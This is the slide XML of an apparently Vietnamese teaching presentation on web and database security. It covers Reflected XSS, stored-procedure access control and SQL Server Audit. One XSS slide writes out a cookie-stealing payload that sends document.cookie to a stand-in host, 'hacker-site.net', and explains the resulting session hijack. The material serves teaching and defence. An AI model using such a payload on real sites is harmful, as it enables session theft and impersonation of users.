          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="525703"/>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780C51B3-1C39-F3D6-61B1-D48513633031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533400" y="2095500"/>
            <a:ext cx="17602199" cy="7689184"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6329B0F9-9F4B-B52C-8DEB-5CAF73A9BD6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04D78CE9-DDD7-6230-71F7-974624B035BC}"/>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8DE5E8F-3B54-5419-DCAA-2DC10C525997}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="965202" y="226731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3</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latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Các cuộc tấn công có thể từ nhiều nguyên nhân (lỗ hổng ) khác nhau</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376A559-FC04-E6A7-4EFA-A2EC2D2B6F90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="983345" y="2775562"/>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3.2 Tấn công Cross-SiteScripting (XSS)</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5901E13-8050-B840-6930-CA719FF60921}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10828530" y="3180267"/>
            <a:ext cx="7218681" cy="5984486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11EAA026-F022-65C3-5996-DB0E9576C341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="983345" y="3321151"/>
            <a:ext cx="9863329" cy="6332503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2100" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Người dùng đăng nhập web và giả sử được gán session:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2100" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Set-Cookie: sessId=5e2c648fa5ef8d653adeede595dcdee4e59d4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2100" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Bằng cách nào đó, hacker gửi được cho người dùng URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2100" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2B6DAD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://example.com/name=var+i=new+Image;+i.src=”http://hacker-site.net/”%2Bdocument.cookie;</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2100" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2100" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Giả sử </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2100" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2B6DAD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2100" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> là website nạn nhân truy cập, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2100" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2B6DAD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>hacker-site.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2100" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> là trang của hacker tạo ra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2100" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Nạn nhân truy cập đến URL trên</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2100" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Server phản hồi cho nạn nhân, kèm với dữ liệu có trong request (đoạn javascript của hacker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2100" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Trình duyệt nạn nhân nhận phản hồi và thực thi đoạn javascript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2100" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Đoạn javascript mà hacker tạo ra thực tế như sau:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2100" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>var i=new Image; i.src=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2100" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2B6DAD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://hacker-site.net/”+document.cookie;</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2100" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2100" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Dòng lệnh trên bản chất thực hiện request đến site của hacker với tham số là cookie người dùng:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2100" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Từ phía site của mình, hacker sẽ bắt được nội dung request trên và coi như session của người dùng sẽ bị chiếm. Đến lúc này, hacker có thể giả mạo với tư cách nạn nhân và thực hiện mọi quyền trên website mà nạn nhân có.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F25E4AAD-25C8-3CBA-B32F-B019ACB395DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12749064" y="9185571"/>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Tấn công Reflected XSS</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575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27562-53D1-A23D-8F15-E37454AE05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4FC10A-66FE-1795-D5F9-93E018FB5432}"/>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18FB995-8F9D-5569-08B1-FD3C1989B6F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5B1938C7-B2E7-549E-E912-38644658EDCE}"/>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A30A6D46-ACB0-2733-44E2-062957C233C5}"/>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6AB02A1-903A-CF45-36B0-4F2833611E8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9A7F8837-FE9D-D995-F6A4-65DAA6032C5A}"/>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92C952F-5830-C262-DE02-E1A1A203006A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3455136"/>
            <a:ext cx="8478159" cy="4632037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pP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ta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đề</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cập</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trước</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5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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2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ính bảo mật của cơ sở dữ liệu không thể dựa vào bảo mật của các cấp độ hệ thống phần mềm khác. Cơ sở dữ liệu phải được tự bảo vệ càng nhiều càng tốt. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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Cách duy nhất để xem, chèn, sửa đổi hoặc xóa dữ liệu là thông qua các quy trình được lưu trữ, trong đó tất cả người dùng đều có quyền thực hiện các thủ tục</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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thủ tục được lưu trữ có logic tích hợp để kiểm tra quyền và quyền của người dùng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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 audit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tất</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25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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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pPr>
            <a:endParaRPr lang="en-US" sz="2500" b="1" u="sng"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6380051-59D9-A6CD-8C1D-FD87AA1580A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10760388" y="2855726"/>
            <a:ext cx="6388381" cy="6335562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C769EE5-76AF-F159-C45A-27C5CE80E0E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12658262" y="9342532"/>
            <a:ext cx="986332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Database</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631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67E9-19B2-8B22-635C-5BA313E365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3D57A9-1A61-2D00-7352-930408384EE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86113FE-99DB-6BE8-1B24-11404BAE9AE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4D23533B-5DCD-0E32-6EB5-B4D0B56F14AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533400" y="2698265"/>
            <a:ext cx="17602199" cy="6712434"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C52AB2B-D578-3FAD-5593-67DF3818D1BD}"/>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FADECB44-9566-4D63-2D2F-3C63679431D6}"/>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8CD02453-5E15-C5F7-0152-B59B1143F292}"/>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023F060-B709-9D0E-3C98-01DC729815B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9334499" y="3900547"/>
            <a:ext cx="8116381" cy="4357985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5B2B235-A6F6-A2FF-5F18-58B7D85631D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11658600" y="8489818"/>
            <a:ext cx="2743199"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Server Audit</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2A624EE-FBA4-1720-F8DE-88C0BA0DF7D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="5217765"/>
            <a:ext cx="7658102" cy="86177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Tạo Server Audit để giám sát các hoạt động Update trên bảng employees bởi người dùng</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2500"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50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A8F7-7FFA-D874-CA37-B54AAE05B6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FBFF45-BAA2-5662-57F2-0CB26509FAF1}"/>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319A1650-623D-85B8-D0A9-D35D0F00E508}"/>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F06F3480-C902-9BC1-C8C4-E929D7F56FB8}"/>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53CF11C8-5B9A-6AA6-4F0F-DF8B9C081883}"/>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AEBCF595-6F95-22A9-1308-F145A2512F82}"/>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F5E8BB7-159C-5DD5-AEF3-BA2716ACE15F}"/>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40902C8-3ADF-FCE4-4376-1016680A4F8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7353812" y="2324100"/>
            <a:ext cx="10760452" cy="6934200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49934895-F14D-3BC9-81EC-9EF88F6A38E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="5360845"/>
            <a:ext cx="5884108" cy="1246495"/>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Tạo Procedure để kiểm tra quyền người dùng và giá trị thay đổi trước khi thay đổi vào trong bảng employees</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2500" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>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C928BF6-51EE-789A-8FCA-31B2642FABD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11353800" y="9258300"/>
            <a:ext cx="2438400" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tạo Procedure</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400" b="1"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5579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F1964-67E4-9AF7-B783-874F8707DE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69AF8B-CD7E-36C9-E4CF-0715B10A4D38}"/>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14B87313-B1E2-AF4E-BF99-23873C32B8E3}"/>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3C83951-A210-E509-6AB0-D45BE9460A86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533400" y="2698264"/>
            <a:ext cx="17602199" cy="7322035"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C44C37D9-74AC-C308-F383-8C6E01474C0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E007B66-0D4F-9DC0-0E49-2D7D95B0410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6E17380F-05BC-B32F-44EA-21CECEC03382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2915208"/>
            <a:ext cx="11049000" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Gi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ải pháp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>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CF51FE-11A5-03C8-F7F8-6934CE668C75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7817276" y="3483690"/>
            <a:ext cx="9506216" cy="1767562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A5DE5E8-2241-CB1E-2A82-E48A669FD3BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1326441" y="5716516"/>
            <a:ext cx="12754563" cy="1890579"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{680FF41A-F6DC-3D76-185F-2D433155FBD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488337" y="7957343"/>
            <a:ext cx="12754563" cy="861774"/>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Sao đó thực thi lệnh để xem lại các thay đổi trên bảng employees. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>iúp bạn theo dõi và ghi lại các hoạt động diễn ra trên hệ thống cơ sở dữ liệu của bạn</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2500" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>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5D36C0F9-6080-5AB8-14E9-EFC1A4905D94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303477" y="3675852"/>
            <a:ext cx="5884108" cy="1246495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
